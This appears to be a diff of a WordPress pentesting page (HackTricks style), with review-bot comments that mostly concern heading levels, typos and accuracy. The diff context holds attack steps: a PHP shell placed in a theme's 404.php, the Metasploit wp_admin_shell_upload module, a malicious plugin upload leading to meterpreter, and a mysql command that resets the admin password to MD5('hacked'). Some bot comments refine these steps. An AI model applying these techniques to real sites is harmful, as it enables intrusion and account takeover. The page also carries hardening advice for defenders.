Appearance → Editor → 404 Template (at the right)
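Review bot: heading level skip: `## **Panel RCE**` is immediately followed by `#### **Modifying a php from the theme used ...**`, while its sibling in the next hunk is `### MSF`; make this one `###` as well and drop the bold from both headings. The wpscan comment above ("bruteforce the admin user using wpscan with -U admin") should also mention `-P <wordlist>`, since `-U` alone does not start a password attack.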
@@ -289,7 +290,7 @@ Change the content for a php shell:
Search in internet how can you access that updated page. In thi case you have to access here: [http://10.11.1.234/wp-content/themes/twentytwelve/404.php](http://10.11.1.234/wp-content/themes/twentytwelve/404.php)
-#### MSF
+### MSF
You can use:
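Review bot: "In thi case you have to access here" should be "In this case you have to access", and the URL is a lab address (`10.11.1.234`) that only makes sense alongside the twentytwelve example in Basic Information; since the general rule is `/wp-content/themes/<active-theme>/404.php`, stating that pattern here would be more useful than "Search in internet how can you access that updated page".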
@@ -299,9 +300,9 @@ use exploit/unix/webapp/wp_admin_shell_upload
to get a session.
-### Plugin RCE
+## Plugin RCE
-#### PHP plugin
+### PHP plugin
It may be possible to upload .php files as a plugin.\
Create your php backdoor using for example:
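Review bot: the `exploit/unix/webapp/wp_admin_shell_upload` context deserves the same caveat the theme-editor subsection has: the module needs valid admin credentials (its `USERNAME` and `PASSWORD` options), since it works by uploading a plugin through the admin panel. A short "admin credentials needed" next to `### MSF` keeps the two RCE paths consistent.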
@@ -328,9 +329,9 @@ Access it and you will see the URL to execute the reverse shell:
![](<../../.gitbook/assets/image (414).png>)
-#### Uploading and activating malicious plugin
+### Uploading and activating malicious plugin
-**(This part is copied from** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
+#### **(This part is copied from** [**https://www.hackingarticles.in/wordpress-reverse-shell/**](https://www.hackingarticles.in/wordpress-reverse-shell/)**)**
Some time logon users do not own writable authorization to make modifications to the WordPress theme, so we choose “Inject WP pulgin malicious” as an alternative strategy to acquiring a web shell.
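Review bot: the attribution line "(This part is copied from https://www.hackingarticles.in/wordpress-reverse-shell/)" has been turned into a `####` heading, but it is a source note, not a section; keep it as an italic line under `### Uploading and activating malicious plugin` so it does not appear in the table of contents. In the quoted paragraph, "pulgin" is a spelling error ("plugin") that can be corrected without changing the quoted text's meaning.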
@@ -362,7 +363,7 @@ As the above commands are executed, you will have your meterpreter session. Just
![](https://i1.wp.com/1.bp.blogspot.com/-s6Yblqj-zQ8/XY9pz0qYWAI/AAAAAAAAguo/WXgEBKIB64Ian\_RQWaltbEtdzCNpexKOwCLcBGAsYHQ/s1600/14.png?w=687\&ssl=1)
-### Post Exploitation
+## Post Exploitation
Extract usernames and passwords:
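Review bot: the screenshot above the new `## Post Exploitation` heading is hot-linked from Blogspot through the `i1.wp.com` proxy and its URL contains a `\_` escape inside the link target; copy the image into `.gitbook/assets` like the rest of the page so it neither breaks nor depends on a third party. Note also that this H2 shares its text with the `#### Post exploitation` subsection earlier in the file.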
@@ -376,9 +377,9 @@ Change admin password:
mysql -u --password= -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
```
-### WordPress Protection
+## WordPress Protection
-#### Regular Updates
+### Regular Updates
Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:
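Review bot: the password-reset command in this hunk's context, `mysql -u --password= -h localhost -e ...`, has empty placeholders that make the shell parse `--password=` as the argument of `-u`; write it as `mysql -u <user> -p'<pass>' -h localhost -e "..."` so it is copy-safe. The `MD5('hacked')` trick works because WordPress still accepts legacy MD5 hashes and rehashes them on the next login; one sentence saying that would explain why a plain MD5 is enough.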
@@ -390,13 +391,13 @@ add_filter( 'auto_update_theme', '__return_true' );
Also, **only install trustable WordPress plugins and themes**.
-#### Security Plugins
+### Security Plugins
* [**Wordfence Security**](https://wordpress.org/plugins/wordfence/)
* [**Sucuri Security**](https://wordpress.org/plugins/sucuri-scanner/)
* [**iThemes Security**](https://wordpress.org/plugins/better-wp-security/)
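Review bot: the hunk header context shows `add_filter( 'auto_update_theme', '__return_true' );` under a sentence that says to confirm it "in wp-config.php"; `add_filter` is not defined yet when `wp-config.php` executes (plugin.php is loaded by `wp-settings.php`, which `wp-config.php` requires at its end), so these filters belong in a plugin or the theme's `functions.php`, while the `wp-config.php` equivalent is `define( 'WP_AUTO_UPDATE_CORE', true );`. "trustable WordPress plugins" should be "trusted".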
-#### **Other Recommendations**
+### **Other Recommendations**
* Remove default **admin** user
* Use **strong passwords** and **2FA**
@@ -404,7 +405,8 @@ Also, **only install trustable WordPress plugins and themes**.
* **Limit login attempts** to prevent Brute Force attacks
* Rename **`wp-admin.php`** file and only allow access internally or from certain IP addresses.
-###
+##
+
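Review bot: the last recommendation says to rename `wp-admin.php`, but no such core file exists; the page's own login-path list names `/wp-login.php` and `/wp-admin/`, and renaming core files breaks updates, so the advice should be to restrict `wp-login.php` and `wp-admin/` to internal or allow-listed IPs (at the web server) instead. The trailing `-###` / `+##` line is an empty heading left over from the export; delete it rather than relevelling it.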
@@ -421,3 +423,5 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
+
+